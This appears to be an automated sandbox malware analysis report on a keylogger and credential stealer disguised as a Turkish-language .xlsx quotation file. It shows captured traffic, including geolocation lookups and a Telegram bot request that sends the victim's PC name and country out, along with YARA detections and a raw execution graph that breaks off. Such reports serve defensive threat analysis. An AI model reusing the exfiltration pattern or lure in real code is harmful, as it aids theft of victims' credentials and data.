                                                                                                                                  2024-12-17 08:41:41 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  6192.168.2.849720104.21.67.1524437960C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-17 08:41:43 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                  2024-12-17 08:41:44 UTC880INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 17 Dec 2024 08:41:44 GMT
                                                                                                                                  Content-Type: text/xml
                                                                                                                                  Content-Length: 362
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                  Age: 413673
                                                                                                                                  Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yR2RAwAW6gVMhnogo4xzAip9eY9OUbetoSCYAeGpXS34hHhXZs62oFbt48MZ93%2FLo1pIl755UcIxrZ6fQ4Mo3%2FNi6hYQAD%2FKeXLLXCn%2B%2BtkfEJTHkM0ciGrwDdAeTFWqRqHGlViH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8f359da31f0f5e6a-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1577&rtt_var=603&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1799137&cwnd=224&unsent_bytes=0&cid=d444569939be9805&ts=450&x=0"
                                                                                                                                  2024-12-17 08:41:44 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  7192.168.2.849722104.21.67.1524437960C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-17 08:41:46 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-12-17 08:41:47 UTC878INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 17 Dec 2024 08:41:47 GMT
                                                                                                                                  Content-Type: text/xml
                                                                                                                                  Content-Length: 362
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                  Age: 413676
                                                                                                                                  Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uG6MzPNM237Ausrmq99RRe%2BOfchDc5iXpuoWn46w%2FPZO4M%2BRZ52CfI9v5XdaJdB8CCJ1dhpnzptjiSWLh19z7K8xJCFYUSrcGh8Vq0MQEUuuBHFaHIKTa3dXaMxjiQ1IitIe3E%2FW"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8f359db61d755e5f-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1729&min_rtt=1574&rtt_var=901&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1036563&cwnd=251&unsent_bytes=0&cid=0f3fe166fe660bac&ts=448&x=0"
                                                                                                                                  2024-12-17 08:41:47 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  8192.168.2.849724104.21.67.1524437960C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-17 08:41:49 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-12-17 08:41:50 UTC876INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 17 Dec 2024 08:41:50 GMT
                                                                                                                                  Content-Type: text/xml
                                                                                                                                  Content-Length: 362
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                  Age: 413679
                                                                                                                                  Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2SVPMqLwntTHycsuk6e0juk%2FepVTmXUgmBzMSD4zqmhaMw4fRKtSq%2BGWx6wdI9cs0eS7Cnsf9oLLSeAAXPFoyhFa93DqyLfFTfOtB0CLVXv2fiAzdVKacov4OobSus%2Fd3L1ieH0w"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8f359dc8c8580f49-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1447&min_rtt=1440&rtt_var=555&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1946666&cwnd=215&unsent_bytes=0&cid=6e428121b3f4b59c&ts=452&x=0"
                                                                                                                                  2024-12-17 08:41:50 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  9192.168.2.849725149.154.167.2204437960C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-17 08:41:51 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20and%20Time:%2018/12/2024%20/%2007:04:25%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                  Host: api.telegram.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-12-17 08:41:52 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                  Date: Tue, 17 Dec 2024 08:41:52 GMT
                                                                                                                                  Content-Type: application/json
                                                                                                                                  Content-Length: 55
                                                                                                                                  Connection: close
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                  2024-12-17 08:41:52 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                  Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                  Click to jump to process

                                                                                                                                  Click to jump to process

                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                  Click to jump to process

                                                                                                                                  Target ID:0
                                                                                                                                  Start time:03:41:18
                                                                                                                                  Start date:17/12/2024
                                                                                                                                  Path:C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe"
                                                                                                                                  Imagebase:0x180000
                                                                                                                                  File size:1'079'296 bytes
                                                                                                                                  MD5 hash:711D0893A047D1AAABD5CB4C1FD8F4AD
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                  Reputation:low
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:2
                                                                                                                                  Start time:03:41:21
                                                                                                                                  Start date:17/12/2024
                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe"
                                                                                                                                  Imagebase:0x280000
                                                                                                                                  File size:45'984 bytes
                                                                                                                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.2658183432.0000000002801000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2658183432.000000000290B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:false

                                                                                                                                  Reset < >

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:3.1%
                                                                                                                                    Dynamic/Decrypted Code Coverage:0.4%
                                                                                                                                    Signature Coverage:4.8%
                                                                                                                                    Total number of Nodes:2000
                                                                                                                                    Total number of Limit Nodes:68
                                                                                                                                    execution_graph 96647 181098 96652 1842de 96647->96652 96651 1810a7 96673 18a961 96652->96673 96656 184342 96659 184378 96656->96659 96690 1893b2 96656->96690 96658 18436c 96694 1837a0 96658->96694 96660 18441b GetCurrentProcess IsWow64Process 96659->96660 96667 1c37df 96659->96667 96662 184437 96660->96662 96663 18444f LoadLibraryA 96662->96663 96664 1c3824 GetSystemInfo 96662->96664 96665 18449c GetSystemInfo 96663->96665 96666 184460 GetProcAddress 96663->96666 96669 184476 96665->96669 96666->96665 96668 184470 GetNativeSystemInfo 96666->96668 96668->96669 96670 18447a FreeLibrary 96669->96670 96671 18109d 96669->96671 96670->96671 96672 1a00a3 29 API calls __onexit 96671->96672 96672->96651 96698 19fe0b 96673->96698 96675 18a976 96708 19fddb 96675->96708 96677 1842f5 GetVersionExW 96678 186b57 96677->96678 96679 1c4ba1 96678->96679 96680 186b67 _wcslen 96678->96680 96681 1893b2 22 API calls 96679->96681 96683 186b7d 96680->96683 96684 186ba2 96680->96684 96682 1c4baa 96681->96682 96682->96682 96733 186f34 22 API calls 96683->96733 96686 19fddb 22 API calls 96684->96686 96687 186bae 96686->96687 96689 19fe0b 22 API calls 96687->96689 96688 186b85 __fread_nolock 96688->96656 96689->96688 96691 1893c9 __fread_nolock 96690->96691 96692 1893c0 96690->96692 96691->96658 96692->96691 96734 18aec9 96692->96734 96695 1837ae 96694->96695 96696 1893b2 22 API calls 96695->96696 96697 1837c2 96696->96697 96697->96659 96700 19fddb 96698->96700 96701 19fdfa 96700->96701 96704 19fdfc 96700->96704 96718 1aea0c 96700->96718 96725 1a4ead 7 API calls 2 library calls 96700->96725 96701->96675 96703 1a066d 96727 1a32a4 RaiseException 96703->96727 96704->96703 96726 1a32a4 RaiseException 96704->96726 96707 1a068a 96707->96675 96712 19fde0 96708->96712 96709 1aea0c ___std_exception_copy 21 API calls 96709->96712 96710 19fdfa 96710->96677 96712->96709 96712->96710 96714 19fdfc 96712->96714 96730 1a4ead 7 API calls 2 library calls 96712->96730 96713 1a066d 96732 1a32a4 RaiseException 96713->96732 96714->96713 96731 1a32a4 RaiseException 96714->96731 96717 1a068a 96717->96677 96723 1b3820 __dosmaperr 96718->96723 96719 1b385e 96729 1af2d9 20 API calls __dosmaperr 96719->96729 96721 1b3849 RtlAllocateHeap 96722 1b385c 96721->96722 96721->96723 96722->96700 96723->96719 96723->96721 96728 1a4ead 7 API calls 2 library calls 96723->96728 96725->96700 96726->96703 96727->96707 96728->96723 96729->96722 96730->96712 96731->96713 96732->96717 96733->96688 96735 18aed9 __fread_nolock 96734->96735 96736 18aedc 96734->96736 96735->96691 96737 19fddb 22 API calls 96736->96737 96738 18aee7 96737->96738 96739 19fe0b 22 API calls 96738->96739 96739->96735 96740 1b90fa 96741 1b9107 96740->96741 96745 1b911f 96740->96745 96797 1af2d9 20 API calls __dosmaperr 96741->96797 96743 1b910c 96798 1b27ec 26 API calls __fread_nolock 96743->96798 96746 1b917a 96745->96746 96754 1b9117 96745->96754 96799 1bfdc4 21 API calls 2 library calls 96745->96799 96760 1ad955 96746->96760 96749 1b9192 96767 1b8c32 96749->96767 96751 1b9199 96752 1ad955 __fread_nolock 26 API calls 96751->96752 96751->96754 96753 1b91c5 96752->96753 96753->96754 96755 1ad955 __fread_nolock 26 API calls 96753->96755 96756 1b91d3 96755->96756 96756->96754 96757 1ad955 __fread_nolock 26 API calls 96756->96757 96758 1b91e3 96757->96758 96759 1ad955 __fread_nolock 26 API calls 96758->96759 96759->96754 96761 1ad961 96760->96761 96762 1ad976 96760->96762 96800 1af2d9 20 API calls __dosmaperr 96761->96800 96762->96749 96764 1ad966 96801 1b27ec 26 API calls __fread_nolock 96764->96801 96766 1ad971 96766->96749 96768 1b8c3e ___scrt_is_nonwritable_in_current_image 96767->96768 96769 1b8c5e 96768->96769 96770 1b8c46 96768->96770 96771 1b8d24 96769->96771 96776 1b8c97 96769->96776 96868 1af2c6 20 API calls __dosmaperr 96770->96868 96875 1af2c6 20 API calls __dosmaperr 96771->96875 96773 1b8c4b 96869 1af2d9 20 API calls __dosmaperr 96773->96869 96779 1b8cbb 96776->96779 96780 1b8ca6 96776->96780 96777 1b8d29 96876 1af2d9 20 API calls __dosmaperr 96777->96876 96778 1b8c53 __fread_nolock 96778->96751 96802 1b5147 EnterCriticalSection 96779->96802 96870 1af2c6 20 API calls __dosmaperr 96780->96870 96784 1b8cab 96871 1af2d9 20 API calls __dosmaperr 96784->96871 96785 1b8cc1 96788 1b8cdd 96785->96788 96789 1b8cf2 96785->96789 96872 1af2d9 20 API calls __dosmaperr 96788->96872 96803 1b8d45 96789->96803 96792 1b8cb3 96877 1b27ec 26 API calls __fread_nolock 96792->96877 96793 1b8ce2 96873 1af2c6 20 API calls __dosmaperr 96793->96873 96794 1b8ced 96874 1b8d1c LeaveCriticalSection __wsopen_s 96794->96874 96797->96743 96798->96754 96799->96746 96800->96764 96801->96766 96802->96785 96804 1b8d6f 96803->96804 96805 1b8d57 96803->96805 96807 1b90d9 96804->96807 96810 1b8db4 96804->96810 96887 1af2c6 20 API calls __dosmaperr 96805->96887 96909 1af2c6 20 API calls __dosmaperr 96807->96909 96808 1b8d5c 96888 1af2d9 20 API calls __dosmaperr 96808->96888 96813 1b8dbf 96810->96813 96814 1b8d64 96810->96814 96821 1b8def 96810->96821 96812 1b90de 96910 1af2d9 20 API calls __dosmaperr 96812->96910 96889 1af2c6 20 API calls __dosmaperr 96813->96889 96814->96794 96817 1b8dcc 96911 1b27ec 26 API calls __fread_nolock 96817->96911 96818 1b8dc4 96890 1af2d9 20 API calls __dosmaperr 96818->96890 96822 1b8e08 96821->96822 96823 1b8e4a 96821->96823 96824 1b8e2e 96821->96824 96822->96824 96857 1b8e15 96822->96857 96894 1b3820 21 API calls __dosmaperr 96823->96894 96891 1af2c6 20 API calls __dosmaperr 96824->96891 96826 1b8e33 96892 1af2d9 20 API calls __dosmaperr 96826->96892 96830 1b8e61 96895 1b29c8 96830->96895 96831 1b8e3a 96893 1b27ec 26 API calls __fread_nolock 96831->96893 96832 1b8fb3 96835 1b9029 96832->96835 96838 1b8fcc GetConsoleMode 96832->96838 96837 1b902d ReadFile 96835->96837 96836 1b8e6a 96839 1b29c8 _free 20 API calls 96836->96839 96840 1b90a1 GetLastError 96837->96840 96841 1b9047 96837->96841 96838->96835 96842 1b8fdd 96838->96842 96843 1b8e71 96839->96843 96844 1b90ae 96840->96844 96845 1b9005 96840->96845 96841->96840 96846 1b901e 96841->96846 96842->96837 96847 1b8fe3 ReadConsoleW 96842->96847 96848 1b8e7b 96843->96848 96849 1b8e96 96843->96849 96907 1af2d9 20 API calls __dosmaperr 96844->96907 96865 1b8e45 __fread_nolock 96845->96865 96904 1af2a3 20 API calls __dosmaperr 96845->96904 96861 1b906c 96846->96861 96862 1b9083 96846->96862 96846->96865 96847->96846 96852 1b8fff GetLastError 96847->96852 96901 1af2d9 20 API calls __dosmaperr 96848->96901 96903 1b9424 28 API calls __fread_nolock 96849->96903 96852->96845 96853 1b29c8 _free 20 API calls 96853->96814 96855 1b8e80 96902 1af2c6 20 API calls __dosmaperr 96855->96902 96856 1b90b3 96908 1af2c6 20 API calls __dosmaperr 96856->96908 96878 1bf89b 96857->96878 96905 1b8a61 31 API calls 2 library calls 96861->96905 96864 1b909a 96862->96864 96862->96865 96906 1b88a1 29 API calls __fread_nolock 96864->96906 96865->96853 96867 1b909f 96867->96865 96868->96773 96869->96778 96870->96784 96871->96792 96872->96793 96873->96794 96874->96778 96875->96777 96876->96792 96877->96778 96879 1bf8a8 96878->96879 96880 1bf8b5 96878->96880 96912 1af2d9 20 API calls __dosmaperr 96879->96912 96883 1bf8c1 96880->96883 96913 1af2d9 20 API calls __dosmaperr 96880->96913 96882 1bf8ad 96882->96832 96883->96832 96885 1bf8e2 96914 1b27ec 26 API calls __fread_nolock 96885->96914 96887->96808 96888->96814 96889->96818 96890->96817 96891->96826 96892->96831 96893->96865 96894->96830 96896 1b29d3 RtlFreeHeap 96895->96896 96897 1b29fc __dosmaperr 96895->96897 96896->96897 96898 1b29e8 96896->96898 96897->96836 96915 1af2d9 20 API calls __dosmaperr 96898->96915 96900 1b29ee GetLastError 96900->96897 96901->96855 96902->96865 96903->96857 96904->96865 96905->96865 96906->96867 96907->96856 96908->96865 96909->96812 96910->96817 96911->96814 96912->96882 96913->96885 96914->96882 96915->96900 96916 1a03fb 96917 1a0407 ___scrt_is_nonwritable_in_current_image 96916->96917 96945 19feb1 96917->96945 96919 1a040e 96920 1a0561 96919->96920 96923 1a0438 96919->96923 96972 1a083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 96920->96972 96922 1a0568 96973 1a4e52 28 API calls _abort 96922->96973 96925 1a0477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 96923->96925 96956 1b247d 96923->96956 96933 1a04d8 96925->96933 96968 1a4e1a 38 API calls 2 library calls 96925->96968 96926 1a056e 96974 1a4e04 28 API calls _abort 96926->96974 96930 1a0576 96931 1a0457 96964 1a0959 96933->96964 96936 1a04de 96937 1a04f3 96936->96937 96969 1a0992 GetModuleHandleW 96937->96969 96939 1a04fa 96939->96922 96940 1a04fe 96939->96940 96941 1a0507 96940->96941 96970 1a4df5 28 API calls _abort 96940->96970 96971 1a0040 13 API calls 2 library calls 96941->96971 96944 1a050f 96944->96931 96946 19feba 96945->96946 96975 1a0698 IsProcessorFeaturePresent 96946->96975 96948 19fec6 96976 1a2c94 10 API calls 3 library calls 96948->96976 96950 19fecb 96955 19fecf 96950->96955 96977 1b2317 96950->96977 96953 19fee6 96953->96919 96955->96919 96959 1b2494 96956->96959 96957 1a0a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 96958 1a0451 96957->96958 96958->96931 96960 1b2421 96958->96960 96959->96957 96961 1b2450 96960->96961 96962 1a0a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 96961->96962 96963 1b2479 96962->96963 96963->96925 97045 1a2340 96964->97045 96967 1a097f 96967->96936 96968->96933 96969->96939 96970->96941 96971->96944 96972->96922 96973->96926 96974->96930 96975->96948 96976->96950 96981 1bd1f6 96977->96981 96980 1a2cbd 8 API calls 3 library calls 96980->96955 96982 1bd213 96981->96982 96985 1bd20f 96981->96985 96982->96985 96987 1b4bfb 96982->96987 96984 19fed8 96984->96953 96984->96980 96999 1a0a8c 96985->96999 96988 1b4c07 ___scrt_is_nonwritable_in_current_image 96987->96988 97006 1b2f5e EnterCriticalSection 96988->97006 96990 1b4c0e 97007 1b50af 96990->97007 96992 1b4c1d 96998 1b4c2c 96992->96998 97020 1b4a8f 29 API calls 96992->97020 96995 1b4c27 97021 1b4b45 GetStdHandle GetFileType 96995->97021 96996 1b4c3d __fread_nolock 96996->96982 97022 1b4c48 LeaveCriticalSection _abort 96998->97022 97000 1a0a97 IsProcessorFeaturePresent 96999->97000 97001 1a0a95 96999->97001 97003 1a0c5d 97000->97003 97001->96984 97044 1a0c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 97003->97044 97005 1a0d40 97005->96984 97006->96990 97008 